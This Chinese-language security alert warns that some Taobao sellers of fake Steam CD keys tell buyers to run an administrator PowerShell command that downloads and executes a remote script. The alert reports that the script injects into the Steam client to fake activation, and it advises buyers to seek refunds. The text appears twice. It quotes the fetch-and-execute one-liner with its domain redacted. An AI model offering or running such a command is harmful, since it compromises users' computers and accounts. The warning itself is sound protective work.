安全提醒:部分商家通过出售虚假 Steam 激活码的方式为用户电脑植入病毒
部分用户反馈,自己在淘宝店购买 Steam CD Key 后,对方要求通过 PowerShell 来进行激活。
例如,在 PowerShell 中输入以下代码:
这段代码实际上是从给定的链接中下载了一段 PowerShell 脚本并在用户电脑执行,用户往往被要求以管理员权限打开 PowerShell。
根据互联网搜索,在 2023 年 10 月这种方式便开始流行。类似的变种经过搜索还有几种,不一一列举。
根据部分分析结果,这个脚本通过注入用户的 Steam 客户端,利用共享账号等方式,来实现假激活 / 假入库等。
如果你购买的 Steam CD Key 不能直接通过 Steam 客户端激活,请直接进行退款,不要在你的电脑上运行任何来路不明的脚本 / 软件。
相关内容:
https://www.zhihu.com/question/628569920
https://www.zhihu.com/question/625605216
https://www.zhihu.com/question/627558855
https://bbs.kanxue.com/thread-279738.htm
https://www.cnblogs.com/macanpsc/p/17831267.html
https://nga.178.com/read.php?tid=38341997&rand=495
https://www.suca.cc/319.html
https://keylol.com/t920654-1-1
部分用户反馈,自己在淘宝店购买 Steam CD Key 后,对方要求通过 PowerShell 来进行激活。
例如,在 PowerShell 中输入以下代码:
irm [REDACTED].run | iex这段代码实际上是从给定的链接中下载了一段 PowerShell 脚本并在用户电脑执行,用户往往被要求以管理员权限打开 PowerShell。
根据互联网搜索,在 2023 年 10 月这种方式便开始流行。类似的变种经过搜索还有几种,不一一列举。
根据部分分析结果,这个脚本通过注入用户的 Steam 客户端,利用共享账号等方式,来实现假激活 / 假入库等。
如果你购买的 Steam CD Key 不能直接通过 Steam 客户端激活,请直接进行退款,不要在你的电脑上运行任何来路不明的脚本 / 软件。
相关内容:
https://www.zhihu.com/question/628569920
https://www.zhihu.com/question/625605216
https://www.zhihu.com/question/627558855
https://bbs.kanxue.com/thread-279738.htm
https://www.cnblogs.com/macanpsc/p/17831267.html
https://nga.178.com/read.php?tid=38341997&rand=495
https://www.suca.cc/319.html
https://keylol.com/t920654-1-1
